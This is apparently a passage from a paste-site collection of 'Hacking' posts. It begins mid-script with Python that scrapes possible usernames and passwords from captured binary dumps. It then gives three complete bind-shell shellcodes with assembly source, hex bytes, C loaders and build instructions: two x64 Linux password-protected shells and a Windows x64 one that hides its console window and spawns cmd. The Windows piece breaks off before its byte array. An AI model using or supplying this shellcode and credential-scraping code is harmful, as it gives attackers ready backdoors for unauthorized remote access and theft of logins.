            sys.stdout.write("binary data: "+str(os.stat('tmpstream.txt').st_size)+"\r")
        else:
            sys.stdout.flush()
            print "strings in binary data found.. password should be around line 10000"
            for line in tailer.follow(open('tmpstrings.out','r')):
                sys.stdout.flush()
                if done == 0:
                    linecount+= 1
                    if line == macaddr:
                        sys.stdout.flush()
                        done = 1
                        print bcolors.OKGREEN+"\n\nmac address triggered.. printing the following dumps, could leak username and passwords.."+bcolors.ENDC
                    else:
                        sys.stdout.write(str(linecount)+"\r")
                elif done == 1:
                    done = 2
                    print "\nfirstline.. "+bcolors.OKGREEN+line+bcolors.ENDC
                elif done == 2:
                    done = 3
                    print "possible username: "+bcolors.OKGREEN+line+bcolors.ENDC
                elif done == 3:
                    done = 4
                    print "possible password: "+bcolors.OKGREEN+line+bcolors.ENDC
                elif done == 4:
                    done = 0
                    print "following line.. \n\n"+bcolors.OKGREEN+line+bcolors.ENDC
                else:
                    pass

    signal.pause()
  15. Moeein Seven

    Hacking

    /*---------------------------------------------------------------------------------------------------------------------
    /*
     *Title: tcp bindshell with password prompt in 162 bytes
     *Author: Sathish kumar
     *Contact: https://www.linkedin.com/in/sathish94
     *Description: x64 Linux bind TCP port shellcode on port 4444 with reconfigurable password
     *Tested On: Ubuntu 14.04 LTS
     *SLAE64-1408
     *Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
     *           ./bindshell
     *           nc localhost 4444
     *
     */
    /*
     * NOTE: This C code binds on port 4444
     * The top of this file contains the .nasm source code
     * The Port can be Reconfigured According to your needs
     * Instructions for changing port number
     * Port obtainer: change the port value accordingly
     * port.py
     *     import socket
     *     port = 4444
     *     hex(socket.htons(port))
     * python port.py
     * Result : 0x5c11
     * Replace the obtained value in the shellcode to change the port number
     * For building from the .nasm source use
     *     nasm -felf64 filename.nasm -o filename.o
     *     ld filename.o -o filename
     * To inspect for nulls
     *     objdump -M intel -D filename.o

    global _start

    _start:
        jmp sock

    prompt:
        db 'Passcode'           ; initialization of prompt data

    ; sock = socket(AF_INET, SOCK_STREAM, 0)
    ; AF_INET = 2
    ; SOCK_STREAM = 1
    ; syscall number 41
    sock:
        xor rax, rax            ; xor nulls the register, because we don't know its value in real cases
        xor rsi, rsi
        mul rsi
        push byte 0x2           ; pushing argument to the stack
        pop rdi                 ; popping the argument into rdi; the top of the stack is removed first because the stack is LIFO
        inc esi                 ; rsi is already 0, so incrementing it makes it 1
        push byte 0x29          ; pushing the syscall number into rax by using the stack
        pop rax
        syscall

        ; copying the socket descriptor from rax to rdi so that we can use it further
        xchg rax, rdi

    ; server.sin_family = AF_INET
    ; server.sin_port = htons(PORT)
    ; server.sin_addr.s_addr = INADDR_ANY
    ; bzero(&server.sin_zero, 8)
    ; setting up the data structure
        push 0x2                        ; AF_INET value is 2, so we push 0x2
        mov word [rsp + 2],0x5c11       ; port 4444 htons hex value is 0x5c11; port values can be obtained by following the instructions above
        push rsp                        ; saving the complete argument to the rsi register
        pop rsi

    ; bind(sock, (struct sockaddr *)&server, sockaddr_len)
    ; syscall number 49
        push rdx                ; inserting the null on the stack
        push byte 0x10
        pop rdx                 ; rdx is set to 16, size of sockaddr
        push byte 0x31
        pop rax                 ; rax is set to 49, syscall for bind
        syscall

    ; listen on the socket for incoming connections
    ; listen(sock, MAX_CLIENTS)
    ; syscall number 50
        pop rsi
        push 0x32
        pop rax                 ; rax is set to 50, syscall for listen
        syscall

    ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
    ; syscall number 43
        push 0x2b
        pop rax                 ; rax is set to 43, syscall for accept
        syscall

        ; storing the client socket descriptor
        mov r9, rax

        ; close parent
        push 0x3
        pop rax                 ; closing the parent socket; rax is set to 3, syscall for close
        syscall

        xchg rdi , r9
        xor rsi , rsi           ; initialization for dup2
        push 0x3
        pop rsi                 ; setting argument to 3
    duplicate:
        dec esi
        mov al, 0x21            ; dup2 syscall applied to stderr, stdout and stdin in a loop
        syscall
        jne duplicate

    ; Prompt for password
        xor rax, rax
        inc al                  ; rax set to 1, syscall for write
        push rax
        pop rdi                 ; rdi set to 1
        lea rsi, [rel prompt]
        xor rdx, rdx            ; clear rdx of previous values
        push 0xe
        pop rdx
        syscall

    ; checking the password using read
    password_check:
        push rsp
        pop rsi
        xor rax, rax            ; read syscall number is 0, so rax is set to 0
        syscall
        push 0x6b636168         ; password to connect to the shell is "hack", pushed in reverse and hex encoded
        pop rax
        lea rdi, [rel rsi]
        scasd                   ; comparing the user input with the password stored on the stack
        jne Exit

    execve:
        ; execve format: execve("/bin/sh", 0, 0)
        xor rsi , rsi
        mul rsi                         ; zeroed rax, rdx registers
        push ax                         ; terminate string with null
        mov rbx , 0x68732f2f6e69622f    ; "/bin//sh" in reverse order
        push rbx
        push rsp
        pop rdi                         ; set RDI
        push byte 0x3b                  ; execve syscall number (59)
        pop rax
        syscall

    Exit:
        ; exit shellcode if password is wrong
        push 0x3c
        pop rax                 ; syscall number for exit is 60
        xor rdi, rdi
        syscall
    */

    #include<stdio.h>
    #include<string.h>

    unsigned char code[] = \
    "\xeb\x08\x50\x61\x73\x73\x63\x6f\x64\x65\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02"
    //Port number: this can be obtained from the instructions above
    "\x11\x5c"
    "\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\xfe\xc0\x50\x5f\x48\x8d\x35\x9d\xff\xff\xff\x48\x31\xd2\x6a\x0e\x5a\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05"
    //Password: this can be obtained by
    /*
     * python
     * password = 'hack'
     * (password[::-1]).encode('hex')
     * Result : 6b636168
     * This is stored in reverse because of the stack
     *
     * */
    "\x68\x68\x61\x63\x6b"
    "\x58\x48\x8d\x3e\xaf\x75\x1a\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05";

    int main()
    {
        printf("Shellcode Length: %d\n", (int)strlen(code));
        int (*ret)() = (int(*)())code;
        ret();
    }
  16. Moeein Seven

    Hacking

    /*
    ;Title: bindshell with password in 92 bytes
    ;Author: David Velázquez a.k.a d4sh&r
    ;Contact: https://mx.linkedin.com/in/d4v1dvc
    ;Description: x64 Linux bind TCP port shellcode on port 31173 with 4 bytes as password in 94 bytes
    ;Tested On: Linux kali64 3.18.0-kali3-amd64 x86_64 GNU/Linux
    ;Compile & Run: nasm -f elf64 -o bindshell.o bindshell.nasm
    ;               ld -o bindshell bindshell.o
    ;               ./bindshell
    ;SLAE64-1379

    global _start

    _start:

    socket:
        ;int socket(int domain, int type, int protocol)  2,1,0
        xor esi,esi             ;rsi=0
        mul esi                 ;rdx,rax,rsi=0, rdx is 3rd argument
        inc esi                 ;rsi=1, 2nd argument
        push 2
        pop rdi                 ;rdi=2, 1st argument
        add al, 41              ;socket syscall
        syscall
        push rax                ;socket result
        pop rdi                 ;rdi=sockfd

        ;struct sockaddr_in {
        ;    sa_family_t    sin_family;  /* address family: AF_INET */
        ;    in_port_t      sin_port;    /* port in network byte order */
        ;    struct in_addr sin_addr;    /* internet address */
        ;};
        push 2                          ;AF_INET
        mov word [rsp + 2], 0xc579      ;port 31173
        push rsp
        pop rsi                         ;rsi=&sockaddr

    bind:
        ;int bind(int sockfd, const struct sockaddr *addr, socklen_t addrlen)
        push rdx                ;initialize with 0 to avoid SEGFAULT
        push 16
        pop rdx                 ;rdx=16 (sizeof sockaddr)
        push 49                 ;bind syscall
        pop rax
        syscall

    listen:
        ;int listen(int sockfd, int backlog)
        pop rsi
        mov al, 50              ;listen syscall
        syscall

    accept:
        ;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
        mov al, 43              ;accept syscall
        syscall

        ;store client
        push rax                ;accept result (client)
        pop rdi                 ;rdi=client
        ;the parent socket is not closed, to keep the shellcode small;
        ;in a loop it would be necessary to close the connection!!

    password:
        ;ssize_t read(int fd, void *buf, size_t count)
        push rsp                ;1st argument
        pop rsi                 ;2nd argument
        xor eax, eax            ;read syscall
        syscall
        cmp dword [rsp], '1234' ;"1234" is the password
        jne error               ;if wrong password then crash the program

        ;int dup2(int oldfd, int newfd)
        push 3
        pop rsi
    dup2:
        dec esi
        mov al, 33              ;dup2 syscall applied to stderr, stdout and stdin
        syscall
        jne dup2

    execve:
        ;int execve(const char *filename, char *const argv[], char *const envp[])
        push rsi
        pop rdx                         ;3rd argument
        push rsi                        ;2nd argument
        mov rbx, 0x68732f2f6e69622f     ;1st argument /bin//sh
        push rbx
        push rsp
        pop rdi
        mov al, 59                      ;execve syscall
        syscall
    error:
        ;SEGFAULT
    */

    #include<stdio.h>
    #include<string.h>

    //gcc -fno-stack-protector -z execstack shellcode.c -o shellcode

    unsigned char code[] = \
    "\x31\xf6\xf7\xe6\xff\xc6\x6a\x02\x5f\x04\x29\x0f\x05\x50\x5f\x6a\x02\x66\xc7\x44\x24\x02\x79\xc5\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x50\x5f\x54\x5e\x31\xc0\x0f\x05\x81\x3c\x24\x31\x32\x33\x34\x75\x1f\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x56\x5a\x56\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";

    int main()
    {
        printf("Shellcode Length: %zu\n", strlen(code));
        int (*ret)() = (int(*)())code;
        ret();
    }
  17. Moeein Seven

    Hacking

    /*
    # Title : Windows x64 Password Protected Bind Shell TCP shellcode
    # size : 825 bytes
    # Author : Roziul Hasan Khan Shifat
    # Tested On : Windows 7 x64 professional
    # Date : 01-01-2017
    */

    /*
    file format pe-x86-64

    Disassembly of section .text:

    0000000000000000 <_start>:
       0:   99                      cltd
       1:   b2 80                   mov    $0x80,%dl
       3:   48 29 d4                sub    %rdx,%rsp
       6:   4c 8d 24 24             lea    (%rsp),%r12
       a:   48 31 d2                xor    %rdx,%rdx
       d:   65 48 8b 42 60          mov    %gs:0x60(%rdx),%rax
      12:   48 8b 40 18             mov    0x18(%rax),%rax
      16:   48 8b 70 10             mov    0x10(%rax),%rsi
      1a:   48 ad                   lods   %ds:(%rsi),%rax
      1c:   48 8b 30                mov    (%rax),%rsi
      1f:   48 8b 7e 30             mov    0x30(%rsi),%rdi
      23:   b2 88                   mov    $0x88,%dl
      25:   8b 5f 3c                mov    0x3c(%rdi),%ebx
      28:   48 01 fb                add    %rdi,%rbx
      2b:   8b 1c 13                mov    (%rbx,%rdx,1),%ebx
      2e:   48 01 fb                add    %rdi,%rbx
      31:   8b 73 1c                mov    0x1c(%rbx),%esi
      34:   48 01 fe                add    %rdi,%rsi
      37:   48 31 d2                xor    %rdx,%rdx
      3a:   41 c7 04 24 77 73 32    movl   $0x5f327377,(%r12)
      41:   5f
      42:   66 41 c7 44 24 04 33    movw   $0x3233,0x4(%r12)
      49:   32
      4a:   41 88 54 24 06          mov    %dl,0x6(%r12)
      4f:   66 ba 40 03             mov    $0x340,%dx
      53:   8b 1c 96                mov    (%rsi,%rdx,4),%ebx
      56:   48 01 fb                add    %rdi,%rbx
      59:   49 8d 0c 24             lea    (%r12),%rcx
      5d:   ff d3                   callq  *%rbx
      5f:   49 89 c7                mov    %rax,%r15
      62:   48 31 d2                xor    %rdx,%rdx
      65:   b2 88                   mov    $0x88,%dl
      67:   41 8b 5f 3c             mov    0x3c(%r15),%ebx
      6b:   4c 01 fb                add    %r15,%rbx
      6e:   8b 1c 13                mov    (%rbx,%rdx,1),%ebx
      71:   4c 01 fb                add    %r15,%rbx
      74:   44 8b 73 1c             mov    0x1c(%rbx),%r14d
      78:   4d 01 fe                add    %r15,%r14
      7b:   66 ba c8 01             mov    $0x1c8,%dx
      7f:   41 8b 1c 16             mov    (%r14,%rdx,1),%ebx
      83:   4c 01 fb                add    %r15,%rbx
      86:   48 31 c9                xor    %rcx,%rcx
      89:   66 b9 98 01             mov    $0x198,%cx
      8d:   48 29 cc                sub    %rcx,%rsp
      90:   48 8d 14 24             lea    (%rsp),%rdx
      94:   66 b9 02 02             mov    $0x202,%cx
      98:   ff d3                   callq  *%rbx
      9a:   48 83 ec 58             sub    $0x58,%rsp
      9e:   48 83 ec 58             sub    $0x58,%rsp
      a2:   48 31 d2                xor    %rdx,%rdx
      a5:   66 ba 88 01             mov    $0x188,%dx
      a9:   41 8b 1c 16             mov    (%r14,%rdx,1),%ebx
      ad:   4c 01 fb                add    %r15,%rbx
      b0:   6a 06                   pushq  $0x6
      b2:   6a 01                   pushq  $0x1
      b4:   6a 02                   pushq  $0x2
      b6:   59                      pop    %rcx
      b7:   5a                      pop    %rdx
      b8:   41 58                   pop    %r8
      ba:   4d 31 c9                xor    %r9,%r9
      bd:   4c 89 4c 24 20          mov    %r9,0x20(%rsp)
      c2:   4c 89 4c 24 28          mov    %r9,0x28(%rsp)
      c7:   ff d3                   callq  *%rbx
      c9:   49 89 c5                mov    %rax,%r13
      cc:   41 8b 5e 04             mov    0x4(%r14),%ebx
      d0:   4c 01 fb                add    %r15,%rbx
      d3:   6a 10                   pushq  $0x10
      d5:   41 58                   pop    %r8
      d7:   48 31 d2                xor    %rdx,%rdx
      da:   49 89 14 24             mov    %rdx,(%r12)
      de:   49 89 54 24 08          mov    %rdx,0x8(%r12)
      e3:   41 c6 04 24 02          movb   $0x2,(%r12)
      e8:   66 41 c7 44 24 02 09    movw   $0xbd09,0x2(%r12)
      ef:   bd
      f0:   49 8d 14 24             lea    (%r12),%rdx
      f4:   4c 89 e9                mov    %r13,%rcx
      f7:   ff d3                   callq  *%rbx
      f9:   41 8b 5e 30             mov    0x30(%r14),%ebx
      fd:   4c 01 fb                add    %r15,%rbx
     100:   6a 01                   pushq  $0x1
     102:   5a                      pop    %rdx
     103:   4c 89 e9                mov    %r13,%rcx
     106:   ff d3                   callq  *%rbx
     108:   48 83 ec 58             sub    $0x58,%rsp
     10c:   eb 12                   jmp    120 <a>

    000000000000010e <kick>:
     10e:   48 83 c4 58             add    $0x58,%rsp
     112:   41 8b 5e 08             mov    0x8(%r14),%ebx
     116:   4c 01 fb                add    %r15,%rbx
     119:   49 8b 4c 24 f8          mov    -0x8(%r12),%rcx
     11e:   ff d3                   callq  *%rbx

    0000000000000120 <a>:
     120:   41 8b 1e                mov    (%r14),%ebx
     123:   4c 01 fb                add    %r15,%rbx
     126:   48 31 d2                xor    %rdx,%rdx
     129:   49 89 14 24             mov    %rdx,(%r12)
     12d:   49 89 54 24 08          mov    %rdx,0x8(%r12)
     132:   b2 10                   mov    $0x10,%dl
     134:   52                      push   %rdx
     135:   4c 8d 04 24             lea    (%rsp),%r8
     139:   49 8d 14 24             lea    (%r12),%rdx
     13d:   4c 89 e9                mov    %r13,%rcx
     140:   ff d3                   callq  *%rbx
     142:   49 89 44 24 f8          mov    %rax,-0x8(%r12)
     147:   41 8b 5e 48             mov    0x48(%r14),%ebx
     14b:   4c 01 fb                add    %r15,%rbx
     14e:   49 8b 4c 24 f8          mov    -0x8(%r12),%rcx
     153:   41 c7 04 24 2d 2d 3e    movl   $0x203e2d2d,(%r12)
     15a:   20
     15b:   49 8d 14 24             lea    (%r12),%rdx
     15f:   6a 04                   pushq  $0x4
     161:   41 58                   pop    %r8
     163:   4d 31 c9                xor    %r9,%r9
     166:   48 83 ec 58             sub    $0x58,%rsp
     16a:   ff d3                   callq  *%rbx
     16c:   41 8b 5e 3c             mov    0x3c(%r14),%ebx
     170:   4c 01 fb                add    %r15,%rbx
     173:   4d 31 c9                xor    %r9,%r9
     176:   6a 08                   pushq  $0x8
     178:   41 58                   pop    %r8
     17a:   49 8d 14 24             lea    (%r12),%rdx
     17e:   49 8b 4c 24 f8          mov    -0x8(%r12),%rcx
     183:   ff d3                   callq  *%rbx
     185:   41 81 3c 24 68 32 37    cmpl   $0x31373268,(%r12)
     18c:   31
     18d:   0f 85 7b ff ff ff       jne    10e <kick>
     193:   41 81 7c 24 04 35 30    cmpl   $0x46383035,0x4(%r12)
     19a:   38 46
     19c:   0f 85 6c ff ff ff       jne    10e <kick>
     1a2:   8b 5e 44                mov    0x44(%rsi),%ebx
     1a5:   48 01 fb                add    %rdi,%rbx
     1a8:   ff d3                   callq  *%rbx
     1aa:   48 31 d2                xor    %rdx,%rdx
     1ad:   41 c7 04 24 75 73 65    movl   $0x72657375,(%r12)
     1b4:   72
     1b5:   66 41 c7 44 24 04 33    movw   $0x3233,0x4(%r12)
     1bc:   32
     1bd:   41 88 54 24 06          mov    %dl,0x6(%r12)
     1c2:   49 8d 0c 24             lea    (%r12),%rcx
     1c6:   48 83 ec 58             sub    $0x58,%rsp
     1ca:   66 ba 40 03             mov    $0x340,%dx
     1ce:   8b 1c 96                mov    (%rsi,%rdx,4),%ebx
     1d1:   48 01 fb                add    %rdi,%rbx
     1d4:   ff d3                   callq  *%rbx
     1d6:   49 89 c6                mov    %rax,%r14
     1d9:   41 c7 04 24 46 69 6e    movl   $0x646e6946,(%r12)
     1e0:   64
     1e1:   41 c7 44 24 04 57 69    movl   $0x646e6957,0x4(%r12)
     1e8:   6e 64
     1ea:   41 c7 44 24 08 6f 77    movl   $0x4141776f,0x8(%r12)
     1f1:   41 41
     1f3:   41 80 74 24 0b 41       xorb   $0x41,0xb(%r12)
     1f9:   48 31 d2                xor    %rdx,%rdx
     1fc:   66 ba 2c 09             mov    $0x92c,%dx
     200:   44 8b 2c 16             mov    (%rsi,%rdx,1),%r13d
     204:   49 01 fd                add    %rdi,%r13
     207:   49 8d 14 24             lea    (%r12),%rdx
     20b:   4c 89 f1                mov    %r14,%rcx
     20e:   41 ff d5                callq  *%r13
     211:   48 31 d2                xor    %rdx,%rdx
     214:   41 c7 04 24 43 6f 6e    movl   $0x736e6f43,(%r12)
     21b:   73
     21c:   41 c7 44 24 04 6f 6c    movl   $0x57656c6f,0x4(%r12)
     223:   65 57
     225:   41 c7 44 24 08 69 6e    movl   $0x6f646e69,0x8(%r12)
     22c:   64 6f
     22e:   41 c7 44 24 0c 77 43    movl   $0x616c4377,0xc(%r12)
     235:   6c 61
     237:   66 41 c7 44 24 10 73    movw   $0x7373,0x10(%r12)
     23e:   73
     23f:   41 88 54 24 12          mov    %dl,0x12(%r12)
     244:   49 8d 0c 24             lea    (%r12),%rcx
     248:   48 83 ec 58             sub    $0x58,%rsp
     24c:   ff d0                   callq  *%rax
     24e:   48 31 d2                xor    %rdx,%rdx
     251:   41 c7 04 24 53 68 6f    movl   $0x776f6853,(%r12)
     258:   77
     259:   41 c7 44 24 04 57 69    movl   $0x646e6957,0x4(%r12)
     260:   6e 64
     262:   66 41 c7 44 24 08 6f    movw   $0x776f,0x8(%r12)
     269:   77
     26a:   41 88 54 24 0a          mov    %dl,0xa(%r12)
     26f:   49 8d 14 24             lea    (%r12),%rdx
     273:   4c 89 f1                mov    %r14,%rcx
     276:   41 55                   push   %r13
     278:   5b                      pop    %rbx
     279:   49 89 c5                mov    %rax,%r13
     27c:   ff d3                   callq  *%rbx
     27e:   4c 89 e9                mov    %r13,%rcx
     281:   48 31 d2                xor    %rdx,%rdx
     284:   ff d0                   callq  *%rax
     286:   4d 31 c0                xor    %r8,%r8
     289:   41 50                   push   %r8
     28b:   5a                      pop    %rdx
     28c:   66 ba 1f 04             mov    $0x41f,%dx
     290:   8b 1c 96                mov    (%rsi,%rdx,4),%ebx
     293:   48 01 fb                add    %rdi,%rbx
     296:   41 50                   push   %r8
     298:   5a                      pop    %rdx
     299:   b2 80                   mov    $0x80,%dl
     29b:   49 8d 0c 24             lea    (%r12),%rcx
     29f:   ff d3                   callq  *%rbx
     2a1:   48 31 d2                xor    %rdx,%rdx
     2a4:   41 c7 44 24 f4 63 6d    movl   $0x41646d63,-0xc(%r12)
     2ab:   64 41
     2ad:   41 88 54 24 f7          mov    %dl,-0x9(%r12)
     2b2:   b2 68                   mov    $0x68,%dl
     2b4:   49 89 14 24             mov    %rdx,(%r12)
     2b8:   b2 ff                   mov    $0xff,%dl
     2ba:   48 ff c2                inc    %rdx
     2bd:   49 8b 44 24 f8          mov    -0x8(%r12),%rax
     2c2:   41 89 54 24 3c          mov    %edx,0x3c(%r12)
     2c7:   49 89 44 24 50          mov    %rax,0x50(%r12)
     2cc:   49 89 44 24 58          mov    %rax,0x58(%r12)
     2d1:   49 89 44 24 60          mov    %rax,0x60(%r12)
     2d6:   48 83 ec 58             sub    $0x58,%rsp
     2da:   48 31 c9                xor    %rcx,%rcx
     2dd:   4d 31 c9                xor    %r9,%r9
     2e0:   6a 01                   pushq  $0x1
     2e2:   41 58                   pop    %r8
     2e4:   4c 89 44 24 20          mov    %r8,0x20(%rsp)
     2e9:   48 89 4c 24 28          mov    %rcx,0x28(%rsp)
     2ee:   48 89 4c 24 30          mov    %rcx,0x30(%rsp)
     2f3:   48 89 4c 24 38          mov    %rcx,0x38(%rsp)
     2f8:   49 8d 14 24             lea    (%r12),%rdx
     2fc:   48 89 54 24 40          mov    %rdx,0x40(%rsp)
     301:   49 8d 54 24 68          lea    0x68(%r12),%rdx
     306:   48 89 54 24 48          mov    %rdx,0x48(%rsp)
     30b:   4d 31 c0                xor    %r8,%r8
     30e:   49 8d 54 24 f4          lea    -0xc(%r12),%rdx
     313:   4d 31 d2                xor    %r10,%r10
     316:   66 41 ba 94 02          mov    $0x294,%r10w
     31b:   42 8b 1c 16             mov    (%rsi,%r10,1),%ebx
     31f:   48 01 fb                add    %rdi,%rbx
     322:   ff d3                   callq  *%rbx
     324:   48 31 d2                xor    %rdx,%rdx
     327:   52                      push   %rdx
     328:   66 ba 29 01             mov    $0x129,%dx
     32c:   8b 1c 96                mov    (%rsi,%rdx,4),%ebx
     32f:   48 01 fb                add    %rdi,%rbx
     332:   59                      pop    %rcx
     333:   48 83 c4 58             add    $0x58,%rsp
     337:   ff d3                   callq  *%rbx
    */

    /*
    section .text
    global _start

    _start:
        cdq
        mov dl, 128
        sub rsp,rdx
        lea r12,[rsp]

        xor rdx,rdx
        mov rax,[gs:rdx+0x60]
        mov rax,[rax+0x18]
        mov rsi,[rax+0x10]
        lodsq
        mov rsi,[rax]
        mov rdi,[rsi+0x30]          ;kernel32.dll base address

        ;-----------------------------------------
        mov dl,0x88
        mov ebx,[rdi+0x3c]
        add rbx,rdi
        mov ebx,[rbx+rdx]
        add rbx,rdi
        mov esi,[rbx+0x1c]          ;kernel32.dll AddressOfFunctions
        add rsi,rdi

    ;=============================================MAIN CODE====================================================;

        ;loading ws2_32.dll
        xor rdx,rdx
        mov [r12],dword 'ws2_'
        mov [r12+4],word '32'
        mov [r12+6],byte dl
        mov dx,832
        mov ebx,[rsi+rdx*4]
        add rbx,rdi
        lea rcx,[r12]
        call rbx
        mov r15,rax                 ;ws2_32.dll base Address

        ;---------------------------
        xor rdx,rdx
        mov dl,0x88
        mov ebx,[r15+0x3c]
        add rbx,r15
        mov ebx,[rbx+rdx]
        add rbx,r15
        mov r14d,[rbx+0x1c]
        add r14,r15                 ;ws2_32.dll AddressOfFunctions

        ;---------------------------------------------
        ;WSAStartup(514,&WSADATA)
        mov dx,114*4
        mov ebx,[r14+rdx]
        add rbx,r15
        xor rcx,rcx
        mov cx,408
        sub rsp,rcx
        lea rdx,[rsp]
        mov cx,514
        call rbx

        ;---------------------------------------------
        ;WSASocketA(2,1,6,0,0,0)
        sub rsp,88
        sub rsp,88
        xor rdx,rdx
        mov dx,98*4
        mov ebx,[r14+rdx]
        add rbx,r15
        push 6
        push 1
        push 2
        pop rcx
        pop rdx
        pop r8
        xor r9,r9
        mov [rsp+32],r9
        mov [rsp+40],r9
        call rbx
        mov r13,rax                 ;SOCKET

        ;----------------------------------------------------------------
        ;--------------------------------------------------
        mov ebx,[r14+4]
        add rbx,r15                 ;bind()
        ;bind(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
        push 16
        pop r8
        xor rdx,rdx
        mov [r12],rdx
        mov [r12+8],rdx
        mov [r12],byte 2
        mov [r12+2],word 0xbd09     ;port 2493 (change it if U want)
        lea rdx,[r12]
        mov rcx,r13
        call rbx

        ;---------------------------------------------------------
        mov ebx,[r14+48]
        add rbx,r15                 ;listen()
        ;listen(SOCKET,1)
        push 1
        pop rdx
        mov rcx,r13
        call rbx

        sub rsp,88
        jmp a

        ;------------------------------------------------
        ;-----------------------------------------
    kick:
        add rsp,88
        mov ebx,[r14+8]
        add rbx,r15                 ;CloseSocket()
        mov rcx,[r12-8]
        call rbx

        ;-----------------------------------
    a:
        mov ebx,[r14]
        add rbx,r15                 ;accept()
        ;accept(SOCKET,(struct sockaddr *)&struct sockaddr_in,16)
        xor rdx,rdx
        mov [r12],rdx
        mov [r12+8],rdx
        mov dl,16
        push rdx
        lea r8,[rsp]
        lea rdx,[r12]
        mov rcx,r13
        call rbx
        mov [r12-8],rax             ;client socket

        ;--------------------------
        ;send(SOCKET,string,4,0)
        mov ebx,[r14+72]
        add rbx,r15                 ;send()
        mov rcx,[r12-8]
        mov [r12],dword 0x203e2d2d
        lea rdx,[r12]
        push byte 4
        pop r8
        xor r9,r9
        sub rsp,88
        call rbx

        ;-------------------------------------------
        mov ebx,[r14+60]
        add rbx,r15                 ;recv()
        xor r9,r9
        push byte 8
        pop r8
        lea rdx,[r12]
        mov rcx,[r12-8]
        call rbx

        ;------------------------
        ;password: h271508F
        cmp dword [r12],'h271'
        jne kick
        cmp dword [r12+4],'508F'
        jne kick

        ;----------------------------------------------
        ;hiding window
        mov ebx,[rsi+68]
        add rbx,rdi
        call rbx                    ;AllocConsole()

        ;---------------------------------------
        xor rdx,rdx
        ;loading user32.dll
        mov [r12],dword 'user'
        mov [r12+4],word '32'
        mov [r12+6],byte dl
        lea rcx,[r12]
        sub rsp,88                  ;reserving memory for API
        mov dx,832
        mov ebx,[rsi+rdx*4]
        add rbx,rdi
        call rbx                    ;LoadLibraryA("user32")
        mov r14,rax                 ;user32.dll base

        ;----------------------------------------------------------------
        ;--------------------------------------
        ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
        ;Finding address of FindWindowA()
        mov [r12],dword 'Find'
        mov [r12+4],dword 'Wind'
        mov [r12+8],dword 'owAA'
        xor byte [r12+11],0x41
        xor rdx,rdx
        mov dx,587*4
        mov r13d,[rsi+rdx]
        add r13,rdi                 ;GetProcAddress() (temporary)
        lea rdx,[r12]
        mov rcx,r14
        call r13

        ;--------------------------------------
        ;-------------------------------------------------
        ;FindWindowA("ConsoleWindowClass",NULL)
        xor rdx,rdx
        mov [r12],dword 'Cons'
        mov [r12+4],dword 'oleW'
        mov [r12+8],dword 'indo'
        mov [r12+12],dword 'wCla'
        mov [r12+16],word 'ss'
        mov [r12+18],byte dl
        lea rcx,[r12]
        sub rsp,88
        call rax

        ;----------------------------------
        ;===========================================================
        xor rdx,rdx
        ;finding Address of ShowWindow()
        mov [r12],dword 'Show'
        mov [r12+4],dword 'Wind'
        mov [r12+8],word 'ow'
        mov [r12+10],byte dl
        lea rdx,[r12]
        mov rcx,r14
        push r13
        pop rbx
        mov r13,rax                 ;HWND
        call rbx

        ;-------------------------------------
        mov rcx,r13
        xor rdx,rdx
        call rax

        ;----------------------------
        ;--------------------------------------
        ;RtlFillMemory(address,length,fill)
        xor r8,r8
        push r8
        pop rdx
        mov dx,1055
        mov ebx,[rsi+rdx*4]
        add rbx,rdi
        push r8
        pop rdx
        mov dl,128
        lea rcx,[r12]
        call rbx

        ;----------------------------------------------------------
        ;----------------------------------------------------------------
        xor rdx,rdx
        mov [r12-12],dword 'cmdA'
        mov [r12-9],byte dl
        mov dl,104
        mov [r12],rdx
        mov dl,255
        inc rdx
        mov rax,[r12-8]
        mov [r12+0x3c],edx
        mov [r12+0x50],rax
        mov [r12+0x58],rax
        mov [r12+0x60],rax

        ;---------------------------------------------------
        ;CreateProcessA(NULL,"cmd",NULL,NULL,TRUE,0,NULL,NULL,&STARTUPINFOA,&PROCESS_INFOMATION)
        sub rsp,88
        xor rcx,rcx
        xor r9,r9
        push 1
        pop r8
        mov [rsp+32],r8
        mov [rsp+40],rcx
        mov [rsp+48],rcx
        mov [rsp+56],rcx
        lea rdx,[r12]
        mov [rsp+64],rdx
        lea rdx,[r12+104]
        mov [rsp+72],rdx
        xor r8,r8
        lea rdx,[r12-12]
        xor r10,r10
        mov r10w,165*4
        mov ebx,[rsi+r10]
        add rbx,rdi                 ;CreateProcessA()
        call rbx

        ;------------------------------------------------------
        ;------------------------------
        xor rdx,rdx
        push rdx
        mov dx,297
        mov ebx,[rsi+rdx*4]
        add rbx,rdi
        pop rcx
        add rsp,88
        call rbx
    */

    #include<windows.h>
    #include<stdio.h>
    #include<string.h>
    #include<tlhelp32.h>

    char shellcode[]=\
